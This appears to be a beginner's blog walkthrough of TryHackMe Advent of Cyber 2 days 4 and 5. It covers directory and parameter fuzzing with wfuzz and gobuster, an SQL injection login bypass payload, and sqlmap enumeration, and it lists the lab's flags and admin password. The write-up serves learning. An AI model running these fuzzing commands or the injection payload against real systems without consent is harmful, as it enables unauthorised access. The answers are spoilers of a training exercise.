Advent Of Cyber 2 Try Hack Me [Day 4 & 5]
Today I am going to do the day 4 and day 5 challenges together
Day 4
this challenges is all about a tool call WFUZZ
this tool is used to brute force attacks on web application. A payload in Wfuzz is a data source. This simple concept enables any input to be inserted into any HTTP request area, enabling complex network security attacks to be conducted on various components of the web application, such as: parameters, authentication, forms, directories/files, headers, etc.
Given the URL “http://shibes.xyz/api.php", what would the entire wfuzz command look like to query the “breed” parameter using the wordlist “big.txt” (assume that “big.txt” is in your current directory)
Note: For legal reasons, do not actually run this command as the site in question has not consented to being fuzzed!
this is how you have to use wfuzz commands
answer is wfuzz -c -z file,big.txt http://shibes.xyz/api.php?breed=FUZZ
Use GoBuster (against the target you deployed — not the shibes.xyz domain) to find the API directory. What file is there?
in the question they mentioned that we need to find an DIR call API so to find it in here I used a tool call Gobuster its used to find out in a web application by brute forcing the application
command for it is gobuster dir -u <URL> -w <wordlist_path> -x <file_type>
now you can see there is a php file in api DIR so answer is site-log.php
Fuzz the date parameter on the file you found in the API directory. What is the flag displayed in the correct post?
now they are telling us to brute force the file to find out the post. in the hint they mention something about date variable so that's what we gonna brute force
this is the command for that wfuzz -c -z file, <wordlist_path> -u <URL>date=FUZZ this fuzz is the value of date variable at chars you can see 13 in 20201125 which mean 13characters are in that post
this is the flag.
Day 5
This challenge is all about SQL injection in here we are going to learn about how to use SQL map it is a automated tool to do sql injection.
Without using directory brute forcing, what’s Santa’s secret login panel?
when you go to the hint you can see text like this /s**tap***l this challenge is about Santa so and in the question the talk about a panel so we get those to right
the answer in /Santapanel
so this is how dose it look like to get in we need to do a SQL injection to login page
so the SQL injection command is santa’ or 1=1- -
and press login you will be able to login to the santa panel
this is how does to look like now I am going to enumerate this data base using SQL map to find out all the other answers
now I am gonna switch on my burp proxy and try to capture the request and through that request I am going use SQL map
How many entries are there in the gift database?
you can see there are 22 gits in the database
What did Paul ask for?
GitHub Ownership
if you scroll further down you can see there are 2 table
What is the flag?
in the above database you can see a database call flag
flag is thmfox{All_I_Want_for_Christmas_Is_You}
What is admin’s password?
EhCNSWzzFP6sc7gB
see you in another blog….!!!
